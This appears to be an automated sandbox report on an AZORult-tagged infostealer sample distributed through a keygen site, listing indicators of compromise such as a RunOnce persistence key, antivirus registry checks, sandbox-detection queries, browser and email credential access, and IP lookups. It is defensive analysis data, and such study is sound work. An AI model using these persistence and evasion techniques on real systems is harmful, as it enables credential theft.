azorult | hxxps://keygenninja[.]com/

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	setup.exe

Loads dropped DLL 26 IoCs

pid	Process
844	setups.tmp
844	setups.tmp
844	setups.tmp
844	setups.tmp
844	setups.tmp
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
5152	Setup3310.tmp
5152	Setup3310.tmp
5184	e2c4myx2qb2.tmp
5272	vict.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5736	layawhdydqp.exe
5848	IBInstaller_97039.tmp

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
8296	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

themida 1 IoCs

Detects Themida, Advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/7416-812-0x0000000000400000-0x0000000000FE1000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hwntnv0ckju = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2JG3OIROEB\\multitimer.exe\" 1 3.1616869295.605f77af35bb3"	multitimer.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json	askinstall20.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 16 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
664	ipinfo.io
668	ipinfo.io
722	api.2ip.ua
723	api.2ip.ua
773	checkip.amazonaws.com
357	checkip.amazonaws.com
409	ip-api.com
291	checkip.amazonaws.com
728	checkip.amazonaws.com
297	ip-api.com
601	checkip.amazonaws.com
231	ipinfo.io
235	ipinfo.io
770	api.2ip.ua
685	ipinfo.io
749	checkip.amazonaws.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\InstallationEngineForIB\is-FS9QA.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-OOBBE.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-BF71L.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-SV4IM.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\System.Data.Entity.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-A5N9H.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\Borland.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-KCILN.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-90GDC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-HF306.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-7FUR1.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\WeriseTweaker.exe	e2c4myx2qb2.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-KVNSE.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-CFF8E.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-EFDLE.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\am805.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-N912P.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\jxpiinstall.exe	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\viewerise\is-HHNKA.tmp	e2c4myx2qb2.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins001.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-E4VIN.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-Q8PR1.tmp	vpn.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-G9OPM.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-CTF07.tmp	e2c4myx2qb2.tmp
File created	C:\Program Files (x86)\MaskVPN\is-G4H73.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-4NSR3.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-T2AR5.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-EPHEC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-CLT7H.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-7E0D1.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-V4IUQ.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-4GI2P.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-DGG39.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-V5JBF.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-9CEFK.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IIOR9.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-DF4UO.tmp	e2c4myx2qb2.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	vpn.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-CJ4KA.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\viewerise\is-QQRB2.tmp	e2c4myx2qb2.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-23PJ3.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-S357D.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins001.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	e2c4myx2qb2.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-O9AJG.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\System.Web.Extensions.Design.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-NCEVV.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-6UQ3T.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-6V8TE.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-EKQA1.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-2LG1A.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	e2c4myx2qb2.tmp
File created	C:\Program Files (x86)\MaskVPN\is-B3N7F.tmp	vpn.tmp

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 26 IoCs

pid	pid_target	Process	procid_target
5400	5520	WerFault.exe	221
5352	5412	WerFault.exe	205
5280	5412	WerFault.exe	205
5936	5412	WerFault.exe	205
3716	5412	WerFault.exe	205
5320	5412	WerFault.exe	205
6328	5412	WerFault.exe	205
5752	5412	WerFault.exe	205
6552	5412	WerFault.exe	205
5712	5412	WerFault.exe	205
3424	7360	WerFault.exe	495
3648	7360	WerFault.exe	495
4628	2032	WerFault.exe	503
5364	7360	WerFault.exe	495
5236	2032	WerFault.exe	503
4324	2032	WerFault.exe	503
8080	7360	WerFault.exe	495
6868	2032	WerFault.exe	503
7508	7360	WerFault.exe	495
6084	7360	WerFault.exe	495
5192	2032	WerFault.exe	503
8364	2032	WerFault.exe	503
8832	7360	WerFault.exe	495
9172	7360	WerFault.exe	495
8232	2032	WerFault.exe	503
3284	2032	WerFault.exe	503

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	msinfo32.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
492	schtasks.exe
6780	schtasks.exe
3828	schtasks.exe
6216	schtasks.exe
7228	schtasks.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
9496	timeout.exe
10040	timeout.exe
8748	timeout.exe
632	timeout.exe
4876	timeout.exe
7784	timeout.exe
7716	timeout.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease	msinfo32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMinorRelease	msinfo32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMinorRelease	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease	msinfo32.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	581	Go-http-client/1.1
HTTP User-Agent header	603	Go-http-client/1.1

Kills process with taskkill 5 IoCs

evasion

pid	Process
2252	taskkill.exe
6080	taskkill.exe
7748	taskkill.exe
3712	taskkill.exe
9768	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "7k0n1e6"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{D0B14F05-15A1-44BE-8CDC-A4EDBAB8093D} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
